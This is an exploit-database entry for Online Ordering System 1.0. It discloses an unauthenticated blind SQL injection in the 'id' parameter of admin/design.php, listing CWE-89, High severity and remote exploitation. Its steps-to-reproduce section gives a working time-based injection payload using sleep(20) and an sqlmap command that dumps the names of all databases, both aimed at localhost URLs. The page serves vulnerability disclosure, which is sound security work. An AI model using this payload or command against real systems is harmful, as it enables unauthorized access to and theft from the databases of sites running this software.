Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | Unavailable | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2021-03-11 |
# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated) # Date: 2021-03-04 # Exploit Author: Suraj Bhosale # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html # Version: v1.0 # Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9 # Vulnerable Parameter: id *Steps to Reproduce:* 1) Visit http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response. 2) Now fire up the following command into SQLMAP. CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9 <http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>* --batch --dbs 3) Using the above command we will get the name of all the database.
Copyright ©2024 Exploitalert.